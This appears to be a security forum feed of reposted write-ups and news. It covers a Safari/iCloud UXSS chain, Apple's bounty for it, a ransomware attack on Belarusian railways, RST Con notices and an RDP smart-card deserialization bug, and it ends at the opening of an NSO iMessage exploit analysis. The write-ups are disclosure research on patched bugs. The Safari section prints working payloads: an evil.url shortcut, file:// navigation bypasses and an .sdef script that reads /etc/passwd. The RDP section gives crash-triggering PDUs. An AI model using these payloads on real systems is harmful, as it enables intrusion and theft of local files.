There was only one small hiccup - I need to know the full path to the webarchive file. Assuming the webarchive gets downloaded via ShareBear, it will live in /Users/<user>/Library/Mobile Documents/com~apple~CloudDocs, which includes the victim's username (not a very scalable attack). Luckily, there is a neat trick to circumvent this requirement - we can mount the webarchive file into the known /Volumes/ directory using a DMG file.

Using the icloud-sharing:// scheme to mount the dmg

Now we know exactly where the webarchive file resides. Which means the below evil.url file will work every time.

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
[InternetShortcut]
URL=file:///Volumes/folder/evil.webarchive
IDList=

evil.url file pointing to a known-location local webarchive

Using the icloud-sharing:// scheme to launch evil.url to open evil.webarchive

And just like that, we are executing JavaScript code anywhere we want. The above screen recording injects 'alert(origin)' in https://google.com. Let's tie this together into one final attack.

Full Chain

Using ShareBear to download and open a webarchive file for us can be broken down into 3 steps:
1) Trick the victim into giving us permission to plant the polymorphic file
2) Turn puppies.png into evil.dmg and launch it
3) Turn evil.dmg into evil.url and launch it

Of course, turning "File A" into three different payloads will require some server-side coordination. Another (less fun) way to pull off this attack is to have the victim agree to open a shared folder that already has all the files ready to go.
Screen Recording of UXSS via viewing an iCloud Shared Folder

In the above screen recording, the victim agrees to view a folder that contains some PNG images. This folder also has two hidden files - .evil.dmg & .evil.url. The website uses the icloud-sharing:// URL Scheme to automatically launch both of the hidden files to successfully bypass Gatekeeper and open a webarchive file. Note that no additional prompts are displayed to the victim after he agrees to view the shared folder.

The example webarchive file above injects code into https://www.icloud.com to exfiltrate the victim's iOS camera roll. Of course, this is just an example; this UXSS attack allows the attacker to inject arbitrary code into arbitrary origins. It would be just as easy to inject JavaScript code to turn on the webcam when hijacking a trusted video chat website like https://zoom.us or https://facetime.apple.com. Mission accomplished.

Screenshot of UXSS hijacking Zoom Website to turn on webcam

Remediation

So how did Apple fix these issues? The first fix was to have ShareBear just reveal files instead of launching them (fixed in macOS Monterey 12.0.1 without being assigned a CVE). The second fix was to prevent WebKit from opening any quarantined files (fixed in Safari 15 as CVE-2021-30861; see fix implementation here).

Bonus Material (#1)

Before I discovered the evil.url trick, I actually found a different way to trick Launch Services into (indirectly) opening a webarchive file. I found this bug on the latest public release of Safari (v14.1.1). A few days after reporting this bug to Apple, they informed me that the beta Safari v15 was not vulnerable. It appeared that an unrelated code refactor made v15 impervious. For completeness' sake, I will quickly go over that bug anyway.

The obvious way to open Safari via Launch Services is with a local HTML file. Once opened, this page will have the file:// URI scheme. From there, JavaScript is allowed to navigate to other file:// URIs.
<script>
  location.href = 'file:///path/to/another/local/file'; // ok if location.protocol == 'file:'
</script>

local HTML file navigating to another local file

So what happens if the file we are navigating to is a webarchive? Well, Safari just hangs.

Screen Recording of Safari refusing to render a webarchive

This annoying hang occurred for every type of page navigation I could think of (anchor href, iframe src, meta redirect, etc.) when the destination file was a webarchive. Then I found this bug:

<script>
  location.href = 'file://fake.com/path/to/evil.webarchive';
</script>

local HTML file navigating to a local webarchive file

Safari forgets to perform the webarchive check when there is a host value in a file:// URL! Funny enough, this bug appears to have been introduced when Apple fixed my old file:// bug (CVE-2020-3885). When Apple informed me that Safari Beta v15 wasn't vulnerable, I went back to the drawing board and found the evil.url hack.

Bonus Material (#2)

There was still one thing that bugged me after I finished the UXSS chain... it can't be used to steal local files. Sure, UXSS can be used to indirectly steal files by injecting code into https://dropbox.com or https://drive.google.com, but files exclusively on the victim's hard drive are out of reach.

The excellent Black Hat presentation I referenced earlier inspired me to look for other System applications that could run my JavaScript in a more privileged context than Safari. After digging around for a while, I stumbled upon an obscure filetype recognized by the macOS Script Editor called "Scripting Additions" (.osax). These files (or rather 'bundles') contain a nested XML-based file called a "Dictionary Document" (.sdef). This dictionary document is used to display human-readable, developer-defined terms used by an AppleScript application. Phew. The important discovery was that these XML-based files are allowed to contain HTML.
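To see why the host-carrying variant could slip past a check keyed on "plain" file:// URLs, here is a small Python sketch (my illustration, not Safari's actual code) splitting the two navigation targets from above: both resolve to the same local path, but only one carries a host component.

```python
from urllib.parse import urlsplit

# The two navigation targets from the snippets above. A check that only
# considered host-less file:// URLs would treat these differently, even
# though they point at the same local file.
plain = urlsplit("file:///path/to/evil.webarchive")
hosted = urlsplit("file://fake.com/path/to/evil.webarchive")

print(plain.netloc)               # '' - no host component
print(hosted.netloc)              # 'fake.com' - host component present
print(plain.path == hosted.path)  # True - identical local path
```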
As it turns out, the HTML renderer also has a JavaScript engine, and this engine does not enforce SOP! (fixed in macOS Big Sur 11.6.2 as CVE-2021-30975) Which means stealing /etc/passwd is easy -

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dictionary SYSTEM "">
<dictionary>
  <suite name="" code="">
    <command name="" code="" description="">
    </command>
    <documentation>
      <html>
        <![CDATA[
          <script>
            fetch('file:///etc/passwd').then(x=>{x.text().then(y=>{document.write(y);})})
          </script>
        ]]>
      </html>
    </documentation>
  </suite>
</dictionary>

evil.sdef displaying the content of /etc/passwd

Luckily for us, Gatekeeper does not mind us opening Scripting Addition files. So we just take evil.sdef, package it in evil.osax, and send it to the victim via ShareBear. Then our icloud-sharing:// URI can automatically launch it in Script Editor.

Screen Recording of ShareBear opening evil.osax to steal /etc/passwd

Nice, so now in addition to UXSS, this hack can also circumvent sandbox restrictions and steal local files!

Conclusion

This project was an interesting exploration of how a design flaw in one application can enable a variety of other, unrelated bugs to become more dangerous. It was also a great example of how, even with macOS Gatekeeper enabled, an attacker can still achieve a lot of mischief by tricking approved apps into doing malicious things.

I submitted these bugs to Apple in mid July 2021. They patched all issues in early 2022 and rewarded me $100,500 as a bounty.

Source: https://www.ryanpickren.com/safari-uxss
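As a quick illustration (my own sketch, not part of the original exploit tooling), a few lines of Python can generate such a dictionary document and confirm that the HTML payload survives inside well-formed XML; the CDATA section is what lets the raw script markup pass through the XML parser untouched.

```python
import xml.etree.ElementTree as ET

# Build a minimal .sdef "Dictionary Document" whose <documentation> block
# smuggles HTML with a script payload, then parse it back to verify it is
# well-formed XML. The payload string matches the evil.sdef example above.
SCRIPT = "fetch('file:///etc/passwd').then(x=>{x.text().then(y=>{document.write(y);})})"

sdef = f"""<?xml version="1.0" encoding="UTF-8"?>
<dictionary>
  <suite name="" code="">
    <command name="" code="" description=""></command>
    <documentation>
      <html><![CDATA[<script>{SCRIPT}</script>]]></html>
    </documentation>
  </suite>
</dictionary>"""

# Encode to bytes so the XML declaration's encoding attribute is honored
root = ET.fromstring(sdef.encode("utf-8"))
doc_html = root.find("suite/documentation/html")
print(doc_html is not None)  # True: the document parses as well-formed XML
```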
-
- 2
-
Apple pays record $100,500 to student who found Mac webcam hack

William Gallagher | Jan 25, 2022

A cyber security student has shown Apple how hacking its Mac webcams can also leave devices fully open to hackers, earning him $100,500 from the company's bug bounty program.

Ryan Pickren, who previously discovered an iPhone and Mac camera vulnerability, has been awarded what is believed to be Apple's largest bug bounty payout. According to Pickren, the new webcam vulnerability concerned a series of issues with Safari and iCloud that he says Apple has now fixed.

Before it was patched, a malicious website could launch an attack using these flaws. In his full account of the exploit, Pickren explains it would give the attacker full access to all web-based accounts, from iCloud to PayPal, plus permission to use the microphone, camera, and screen sharing. If the camera were used, however, its regular green light would still come on as normal.

Pickren reports that the same hack would ultimately mean that an attacker could gain full access to a device's entire filesystem. It would do so by exploiting Safari's "webarchive" files, the system the browser uses to save local copies of websites.

"A startling feature of these files is that they specify the web origin that the content should be rendered in," writes Pickren. "This is an awesome trick to let Safari rebuild the context of the saved website, but as the Metasploit authors pointed out back in 2013, if an attacker can somehow modify this file, they could effectively achieve UXSS [universal cross-site scripting] by design."

A user has to download such a webarchive file, and then also open it.
According to Pickren, this meant Apple did not consider this a realistic hack scenario when it first implemented Safari's webarchive. "Granted this decision was made nearly a decade ago, when the browser security model wasn't nearly as mature as it is today," says Pickren.

Tightening security

"Prior to Safari 13, no warnings were even displayed to the user before a website downloaded arbitrary files," he continued. "So planting the webarchive file was easy."

Apple has not commented on the bug, nor is it known if it has been actively exploited. But Apple has paid Pickren $100,500 from its bug bounty program, $500 more than previously reported payouts.

The bug bounty program can officially award up to $1 million, and the company publishes a list of maximum sums per category of security issue reported. There is no requirement for security experts to publicly disclose how much they've been awarded, so it's possible that Apple has paid out more than Pickren's $100,500. However, the company has previously been greatly criticized for paying less than its own maximums, as well as for being slow to patch reported bugs.

Source: https://appleinsider.com/articles/22/01/25/apple-pays-record-100500-to-student-who-found-mac-webcam-hack
-
- 1
-
A group of hackers claims to have disrupted the transport of Russian troops toward Ukraine through Belarus after infecting the servers used by the Belarusian railway system with ransomware.

Belarusian Cyber-Partisans, a hacker group opposed to the Lukashenko regime, which they call terrorist, announced on Twitter that they attacked and compromised the Belarusian national railway system with ransomware. They say they managed to encrypt a significant number of servers and destroyed the backups in order to slow down and even interrupt the transport of Russian troops by rail.

Security experts have not confirmed the attack, but they say the first indications do suggest that someone breached the BelZhD network, and that this is the first time ransomware has been used in such a manner. Several BelZhD websites are currently down, affecting various public services such as buying tickets online.

According to multiple sources, Russia is transporting troops toward Ukraine through Belarus, to the border between the two countries. Belarusian officials claim the troop movement is taking place ahead of a joint military exercise.

Source: https://adevarul.ro/international/europa/hackerii-atacat-ransomware-sistemul-feroviar-belarus-opri-transportul-trupelor-rusesti-granita-belarus-ucraina-1_61ef88e25163ec42711dae02/index.html
-
- 4
-
Hi,

RST Con #2 will take place on March 16-17, 2022. RST Con CTF #2 will take place during the same period. Anyone interested in creating an exercise for the CTF is asked to contact me via private message or at contact@rstcon.com

The exercises can be of any difficulty level and can cover any branch of security. If VPSes are needed, you will receive them some time before the CTF. In the meantime, I will be working on https://rstcon.com, the CTF platform, and other necessary things.

We also want to offer prizes to the winners, like last year. If there are people who can donate for the CTF, please contact me.

If you have questions or suggestions, I'm happy to hear them here. Thanks!
-
Hi,

Since there aren't many conferences in the spring, we decided it would be an ideal period for RST Con #2. The conference will be online, free, and in Romanian.

Details: https://rstcon.com/
Conference dates: March 17-18, 2022 (Thursday and Friday)

Events:
LinkedIn: https://www.linkedin.com/events/rstcon-26894664423269556224/about/
Facebook: https://www.facebook.com/events/312925840851762/

Registration (Zoom):
- Day one (March 17): https://us02web.zoom.us/webinar/register/7716432416217/WN_ihd6n-QbT9SmhUFEEiOouw
- Day two (March 18): https://us02web.zoom.us/webinar/register/8216433285169/WN_FvmdS_d2SJSo-OJpFaNRMA

Call for papers: https://rstcon.com/call-for-papers/
CTF: https://rstcon.com/ctf/

I'm still working on the necessary things (e.g., the CTF platform). Thanks!
-
Hi, I don't know if it can be found, but you can ask some friends for a few if you're working on a personal project.
-
On the 20th I already have another beer outing planned; I'll see what the mountain weather is like for Saturday, in case I head out again...
-
On the 22nd, on the weekend? In principle I could make it during the week; on weekends I'm usually out of town (at the ski slopes, if anyone's up for it)
-
These days it's simply not worth doing anything illegal. You can earn good money legally. The first step is to discover something you enjoy doing.
-
There are several online solutions, but none of them seem to work very well. The solution would be a manual one: replace certain function calls with "document.write" or another method that, instead of executing the code, displays what is about to be executed. The code is quite large and complex, so it would take a while, but it's not exactly impossible.
-
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666)

This is the third installment in my three-part series of articles on fuzzing Microsoft's RDP client, where I explain a bug I found by fuzzing the smart card extension.

MSRC Report: RDP Client Information Disclosure Vulnerability (CVE-2021-38666)
CVSS 8.8 (Critical)

Other articles in this series:
- Fuzzing Microsoft's RDP Client using Virtual Channels: Overview & Methodology
- Remote ASLR Leak in Microsoft's RDP Client through Printer Cache Registry (CVE-2021-38665)
- Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666)

Table of Contents
- Introduction
- Fuzzing RDPDR, the File System Virtual Channel Extension
- Analyzing crashes
- Smart Cards and RPC
- The RPC NDR marshaling engine
- Root cause
- Heap corruption
- Exploitation
- Reporting to Microsoft
- Disclosure Timeline

Introduction

The Remote Desktop Protocol (RDP) is a proprietary protocol designed by Microsoft which allows the user of an RDP client software to connect to a remote computer over the network with a graphical interface. Its use around the world is very widespread; some people, for instance, use it often for remote work and administration.

Most vulnerability research is concentrated on the RDP server. However, some critical vulnerabilities have also been found in the past in the RDP client, which would allow a compromised server to attack a client that connects to it. At Black Hat Europe 2019, a team of researchers showed they found an RCE in the RDP client. Their motivation was that North Korean hackers would allegedly carry out attacks through RDP servers acting as proxies, and that you could hack them back by setting up a malicious RDP server to which they would connect.

During my internship at Thalium, I spent time studying and reverse engineering Microsoft RDP, learning about fuzzing, and looking for vulnerabilities.
In this article, I will explain how I found a deserialization bug in the Microsoft RDP client, but for which I unfortunately couldn't provide an actual proof of concept. If you are interested in details about the Remote Desktop Protocol, reversing the Microsoft RDP client or fuzzing methodology, I invite you to read my first article, which tackles these subjects. Either way, I will briefly provide some context required to understand this article:

- The target is Microsoft's official RDP client on Windows 10. The executable is mstsc.exe (in system32), but the main DLL for most of the client logic is mstscax.dll.
- RDP uses the abstraction of virtual channels, a layer for transporting data. For instance, the channel RDPSND is used for audio redirection, and the channel CLIPRDR is used for clipboard synchronization. Each channel behaves according to separate logic and its own protocol, whose official specification can often be found in the Microsoft docs.
- Virtual channels are a great attack surface and a good entrypoint for fuzzing. I fuzzed virtual channels with a modified version of WinAFL and a network-level harness.

Fuzzing RDPDR, the File System Virtual Channel Extension

RDPDR is the name of the static virtual channel whose purpose is to redirect access from the server to the client file system. It is also the base channel that hosts several sub-extensions such as the smart card extension, the printing extension and the serial/parallel ports extension.

RDPDR is one of the few channels that are opened by default in the RDP client, alongside the other static channels RDPSND, CLIPRDR and DRDYNVC. This makes it an even more interesting target risk-wise. Microsoft has some nice documentation on this channel. It contains the different PDU types, their structures, and even dozens of examples of PDUs, which is great for seeding our fuzzer.
Fuzzing RDPDR yielded a few small bugs, as well as another bug for which I got a CVE (see my previous article: Remote ASLR Leak in Microsoft's RDP Client through Printer Cache Registry). The bug detailed in this article is one of the denser bugs I've had to deal with among my RDP findings. It was found by analyzing crashes that I got during fuzzing. It may sound obvious, but it's actually not; for instance, the previous vulnerability I found had no crash associated with it.

Analyzing crashes

The crashes happened while fuzzing the Smart Card sub-protocol, and were quite... enigmatic.

Perplexing logs of crashes while fuzzing RDPDR

There were a lot of crashes, in many different modules, and also (not shown on the screenshot) in mstscax.dll. In fact, there were way too many crashes at random places for all of this to make any sense, so I thought something was broken with my fuzzing. However, one crash seemed to reoccur more frequently inside RPCRT4.DLL. We've gotten a tiny glimpse of RPC while investigating DRDYNVC in the first article, but it's gonna get more serious now.

Smart Cards and RPC

The crashes in RPCRT4.DLL arise in NdrSimpleTypeConvert+0x307:

mov eax, [rdx] ; crash
bswap eax
mov [rdx], eax

It's a classic out-of-bounds read on what seems to be the byteswap of a DWORD in the heap. Fortunately, we are able to find the associated payload and instantly reproduce the bug. Here's what the call stack looks like when the crash occurs:

Call stack at time of the crash in RPCRT4.DLL

So before entering RPCRT4.DLL, we were in mstscax!W32SCard::LocateCardsByATRA. But actually, if we also analyze other payloads that lead to the same crash, the call stack will interestingly point out other functions in mstscax.dll, such as:

- W32SCard::HandleContextAndTwoStringCallWithLongReturn
- W32SCard::WriteCache
- W32SCard::DecodeContextAndStringCallW
- ...

What's with all of these? Here's one thing all these functions have in common: the following snippet of code.
v6 = MesDecodeBufferHandleCreate(
    &PDU->InputBuffer,
    PDU->InputBufferLength,
    &pHandle
);

// ...

NdrMesTypeDecode3(
    pHandle,
    &pPicklingInfo,
    &pProxyInfo,
    (const unsigned int **)&ArrTypeOffset,
    0xEu,
    &pObject
); // Crash here

The only thing that varies across these functions is the fifth parameter of NdrMesTypeDecode3 (the 0xE). We also immediately notice that PDU->InputBufferLength (DWORD) can be arbitrarily large... Before going any further, let's dissect two of the guilty payloads as well.

rpc-crash-1
  DeviceIoRequest:    72 44 52 49 01 00 00 00 f8 01 02 00 08 00 00 00 0e 00 00 00 00 00 00 00
  OutputBufferLength: 00 40 00 00
  InputBufferLength:  00 80 2d 00
  IoControlCode:      e8 00 09 00
  Padding:            00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 08 00
  InputBuffer:        01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00
                      00 03 00 08 00 01 40 00 00 16 00 00 00 01 00 00 00

rpc-crash-2
  DeviceIoRequest:    72 44 52 49 01 00 00 00 f8 00 00 00 04 10 00 00 0e 00 00 00 00 00 00 00
  OutputBufferLength: 00 40 00 00
  InputBufferLength:  6f 63 06 00
  IoControlCode:      64 00 09 00
  Padding:            00 00 ff 00 00 00 00 40 00 20 00 66 00 00 77 66 64 63 08 00
  InputBuffer:        01 00 00 00 00 00 00 00 00 00 00 04 00 00 00 0e 00 00 00 00
                      00 00 00 00 40 00 00 6f 63 06 00 64 00 09 00 00 00 ff 00 00
                      00 00 40 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00
                      00 00 00 00 00 00 00 00 6c 00 00 05

So those are Device I/O Request PDUs, more specifically of sub-type Device Control Request. We already met one in the first article, in the arbitrary malloc bug. But what is this IoControlCode field exactly? According to the specification:

IoControlCode (4 bytes): A 32-bit unsigned integer. This field is specific to the redirected device.

Specific to the redirected device... For some reason, it took me a long time to realize there was actually a dedicated specification for the Smart Card sub-protocol (as well as the others).
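To make the length mismatch concrete, here is a small Python sketch (my own, not from the original article) that rebuilds the rpc-crash-1 PDU from the dissected fields above, following the Device Control Request layout from MS-RDPEFS, and compares the claimed InputBufferLength against the bytes actually present.

```python
import struct

# DeviceIoRequest header: "rDRI", DeviceId, FileId, CompletionId,
# MajorFunction (0xE = IRP_MJ_DEVICE_CONTROL), MinorFunction
header = bytes.fromhex("72445249 01000000 f8010200 08000000 0e000000 00000000")
padding = bytes.fromhex("0000000000000000000000000200000002000800")

# The 57 bytes of InputBuffer actually present on the wire (from rpc-crash-1)
input_buffer = (bytes([0x01]) + bytes(29) + bytes([0x01, 0x00]) + bytes(9)
                + bytes([0x03, 0x00, 0x08, 0x00, 0x01, 0x40, 0x00, 0x00,
                         0x16, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00]))

# OutputBufferLength, InputBufferLength, IoControlCode (little-endian DWORDs)
pdu = header + struct.pack("<III", 0x4000, 0x002D8000, 0x000900E8) + padding + input_buffer

# Parse it back the way the client reads the fields
out_len, in_len, ioctl = struct.unpack_from("<III", pdu, 24)
actual = len(pdu) - 56  # header (24) + lengths/ioctl (12) + padding (20)
print(hex(ioctl))       # 0x900e8 -> LocateCardsByATRA
print(in_len, actual)   # 2981888 bytes claimed, only 57 actually sent
```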
Section 3.1.4 of the Smart Card specification answers our suspicion. It contains a long table that maps IoControlCode values to types of IRP_MJ_DEVICE_CONTROL requests and associated structures. Therefore, there are around 60 functions that contain the same pattern of code using MesDecodeBufferHandleCreate followed by NdrMesTypeDecode3. They are all called the same way with our InputBuffer and InputBufferLength; only a certain offset parameter varies each time.

According to the specification, for IoControlCode set to 0x000900E8, we get the following LocateCardsByATRA_Call structure:

typedef struct _LocateCardsByATRA_Call {
    REDIR_SCARDCONTEXT Context;
    [range(0,1000)] unsigned long cAtrs;
    [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks;
    [range(0,10)] unsigned long cReaders;
    [size_is(cReaders)] ReaderStateA* rgReaderStates;
} LocateCardsByATRA_Call;

It seems then that, based on IoControlCode, our input buffer will be decoded according to a certain structure.

The RPC NDR marshaling engine

Let's come back to the decoding piece of code:

v6 = MesDecodeBufferHandleCreate(
    &PDU->InputBuffer,
    PDU->InputBufferLength,
    &pHandle
);

This function from RPCRT4 is documented by Microsoft: "The MesDecodeBufferHandleCreate function creates a decoding handle and initializes it for a (fixed) buffer style of serialization."

So this is what it is all about... RPC has its own serialization engine, called the NDR marshaling engine (Network Data Representation). In particular, there is documentation on how data serialization works: header, format strings, types, etc. The RDP client makes "manual" use of the RPC NDR serialization engine to decode structures from the PDUs. After having initialized the decoding handle with the input buffer and length, the data is effectively deserialized:

NdrMesTypeDecode3(
    pHandle,
    &pPicklingInfo,
    &pProxyInfo,
    (const unsigned int **)&ArrTypeOffset,
    0xEu,
    &pObject
);

And to our surprise... the function NdrMesTypeDecode3 is nowhere to be documented!
The reason is that developers are not supposed to use this function directly. Instead, one should describe structures using Microsoft's IDL (Interface Description Language). Next, the MIDL compiler should be used to generate stubs that can encode and decode data (using the NdrMes functions underneath). Nonetheless, header files contain information about the parameters and their types that can help us understand a bit more.

Interesting fields inside NdrMesTypeDecode3's arguments (pProxyInfo)

In particular, the pProxyInfo argument eventually leads to a Format field. It seems to contain a compiled description of all the types that exist and are used within the Smart Card extension. Then the ArrTypeOffset array, which starts like this: 0x02, 0x1e, 0x1e, 0x54, ..., lists the offsets of all the structures of interest inside the compiled format string.

The next argument (0xE) is the offset, in the ArrTypeOffset array, of the structure we want to consider. For LocateCardsByATRA, 0xE gives an offset of 0x220 in the ArrTypeOffset array, which points to the compiled format associated with the structure we found earlier in the specification:

typedef struct _LocateCardsByATRA_Call {
    REDIR_SCARDCONTEXT Context;
    [range(0,1000)] unsigned long cAtrs;
    [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks;
    [range(0,10)] unsigned long cReaders;
    [size_is(cReaders)] ReaderStateA* rgReaderStates;
} LocateCardsByATRA_Call;

We are lucky the specification tells us everything about the type structures, and even releases the full IDL in an appendix. If we didn't have these, we would have had to decompile the format ourselves, and not only the format pointed to by the offset we found. Indeed, there are also many references to other previously defined structures, such as LocateCards_ATRMask.

Root cause

This may be getting a bit hard to follow, so let's summarize what we understand for now:

- We can send an IoControlCode, InputBuffer and InputBufferLength.
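The two-level lookup can be modeled in a few lines of Python. This is purely illustrative: only the first four ArrTypeOffset entries and the value at index 0xE are known from the analysis above, so the other entries are placeholders.

```python
# Illustrative model of how NdrMesTypeDecode3's fifth argument selects a type:
# it indexes ArrTypeOffset, and the stored value is an offset into the compiled
# NDR format string. Entries marked 0x00 are unknown placeholders.
arr_type_offset = [0x02, 0x1E, 0x1E, 0x54] + [0x00] * 10 + [0x220]


def format_offset(type_index: int) -> int:
    """Resolve a type index to its offset in the compiled format string."""
    return arr_type_offset[type_index]


# Index 0xE resolves to 0x220: the compiled format of LocateCardsByATRA_Call
print(hex(format_offset(0xE)))
```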
- The InputBufferLength (DWORD) can be greater than the actual length of InputBuffer.
- The input buffer will be deserialized (through the RPC NDR marshaling engine) according to a structure that varies with IoControlCode.
- There are around 60 possible IoControlCode values, and thus decoding structures.
- There's an OOB read during the deserialization process, in a certain function NdrSimpleTypeConvert.

Now, as I was reversing and debugging, it seemed to me that these "convert" operations actually took place before any real decoding per se. It was as if, before deserializing, there was a first pass on the whole buffer to convert stuff. I eventually found a Windows XP source leak that helped shed light on all of this:

void NdrSimpleTypeConvert(PMIDL_STUB_MESSAGE pStubMsg, uchar FormatChar)
{
    switch (FormatChar) {
        // ...
        case FC_ULONG:
            ALIGN(pStubMsg->Buffer, 3);
            CHECK_EOB_RAISE_BSD(pStubMsg->Buffer + 4);
            if ((pStubMsg->RpcMsg->DataRepresentation & NDR_INT_REP_MASK) != NDR_LOCAL_ENDIAN) {
                *((ulong *)pStubMsg->Buffer) = RtlUlongByteSwap(*(ulong *)pStubMsg->Buffer);
            }
            pStubMsg->Buffer += 4;
            break;
        // ...
    }
}

The magic happens when the endianness of the serialized data does not match the local endianness. A pass on the buffer is performed to switch the endianness of (in particular) all the FC_ULONG type fields (the unsigned long fields in our structure).

Therefore, in the _LocateCardsByATRA_Call structure, the fields cAtrs and cReaders are byteswapped. But also, and more importantly, any unsigned long that lies inside the nested rgAtrMasks or rgReaderStates fields will be byteswapped. And these fields are arrays of structs whose size we control!
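The effect of trusting an attacker-controlled element count in this conversion pass can be simulated with a short Python toy model (my own sketch, not the real NDR engine). Each LocateCards_ATRMask element is 4 + 36 + 36 = 76 bytes, with an FC_ULONG at offset 0, so the pass byteswaps one DWORD every 76 bytes for as many elements as the attacker claims:

```python
import struct

ATR_MASK_SIZE = 4 + 36 + 36  # cbAtr (FC_ULONG) + rgbAtr[36] + rgbMask[36]


def convert_pass(heap: bytearray, start: int, count: int) -> None:
    """Toy model of the NDR endianness-conversion pass over an array of
    LocateCards_ATRMask structs: byteswap the leading ULONG of each 76-byte
    element, blindly trusting the attacker-supplied element count."""
    off = start
    for _ in range(count):
        (val,) = struct.unpack_from(">I", heap, off)  # read as big-endian...
        struct.pack_into("<I", heap, off, val)        # ...store native: a bswap
        off += ATR_MASK_SIZE


# A toy "heap": the serialized array really occupies 2 elements, and an
# adjacent allocation (e.g. part of another object) sits right after it.
heap = bytearray(4 * ATR_MASK_SIZE)
struct.pack_into("<I", heap, 2 * ATR_MASK_SIZE, 0x11223344)  # neighbor's DWORD

convert_pass(heap, 0, count=3)  # attacker claims 3 elements instead of 2

(corrupted,) = struct.unpack_from("<I", heap, 2 * ATR_MASK_SIZE)
print(hex(corrupted))  # 0x44332211: the neighbor object's DWORD got byteswapped
```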
So there are actually two kinds of overruns here:

- the user-supplied PDU->InputBufferLength is not properly checked, so the conversion pass in the RPC NDR deserialization will go way beyond the end of the PDU in the heap;
- the user-supplied cAtrs (or cReaders) that is coded inside the serialized data can be large enough to make the deserialized structure overflow the actual length of the buffer, along with the input buffer length we provided.

Combined, these overruns result in an out-of-bounds read in the heap, and thus a crash.

Heap corruption

We managed to clear up why we got crashes in RPCRT4.DLL, and which payloads triggered them. However, we haven't yet found an explanation for the tons of other nonsensical crashes we've had. Let's check the LocateCards_ATRMask structure, which is nested inside LocateCardsByATRA_Call:

typedef struct _LocateCards_ATRMask {
    [range(0, 36)] unsigned long cbAtr;
    byte rgbAtr[36];
    byte rgbMask[36];
} LocateCards_ATRMask;

There's an unsigned long field (cbAtr) at the beginning of this struct of total size 76 bytes. Therefore, we may be able to perform byteswaps of DWORDs in the heap every 76 bytes! We can confirm this by setting a breakpoint where the byteswap occurs and watching the heap progressively getting disfigured.

Since the PDU->InputBufferLength variable is arbitrarily large, we can, as we said, eventually reach the end of the heap segment to cause an OOB read crash. But this is not the interesting thing here. By byteswapping DWORDs in the heap, we are corrupting a lot of objects. If the input buffer length is large enough to allow out-of-bounds operations, but small enough not to exceed the heap segment, the deserialization process will return with a damaged heap. This leads to numerous types of crashes; all the odd unexplained crashes that I encountered earlier.
- Heap Corruption exceptions during heap management calls
- Random pointers being damaged and causing access violations
- Damaged vtable pointers causing access violations
- Damaged vtable pointers that still successfully resolve and redirect the execution flow, of course crashing directly after (illegal instruction)
- The "unknown module" crashes I found earlier!

Exploitation

I suspect some of these behaviors could be exploited to achieve unexpected harmful results such as remote code execution. For instance, I thought that with some heap spray, one could manage to hijack a vtable through a well-aligned byteswap and redirect the execution flow. But it seemed quite tricky to carry out, and I did not manage to exploit it myself.

There may also be other repercussions of this deserialization bug. I saw that there were other kinds of conversions that could be performed (float conversions, EBCDIC <-> ASCII...), but I'm not sure whether it is actually possible to trigger them.

Reporting to Microsoft

At first, I was hesitant about whether I should report this to MSRC or not. Indeed, I was very unsure about this bug's exploitability, which seemed to me like it would be very intricate and rely on a lot of luck. Moreover, by submitting it, I would have to tag it as Remote Code Execution, which I thought would be a bold move without any proof of concept.

I still reported it to MSRC, and rightfully so, as it was assessed Remote Code Execution with Critical severity and awarded a $5,000 bounty!

In conclusion, don't be afraid to submit bugs even if you lack proof of exploitation. As long as you have a very detailed explanation of the bug, a good understanding of the root cause and a decent analysis of the risks that come with it, it can be acknowledged and awarded.
The exploitation process can sometimes require a lot of skill and creativity, and you can always tell yourself that even if you can't exploit your own bug, there may be an evil super hacker out there that would manage to exploit it - better be safe than sorry.

Disclosure Timeline

- 2021-07-22: Sent vulnerability report to MSRC (Microsoft Security Response Center)
- 2021-07-23: Microsoft started reviewing and reproducing
- 2021-07-31: Microsoft acknowledged the vulnerability and started developing a fix. They also started reviewing this case for a potential bounty award.
- 2021-08-04: Microsoft assessed the vulnerability as Remote Code Execution with Important severity. Bounty award: $5,000.
- 2021-08-13: The vulnerability was assigned CVE-2021-38666.
- 2021-11-09: Microsoft released the security patch. For some reason, the severity was revised to Critical when the CVE was published.

2021-12-10 by Valentino Ricotta

Sursa: https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/
-
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution Posted by Ian Beer & Samuel Groß of Google Project Zero We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research. Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works. Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states. The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860. NSO NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities. For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases. 
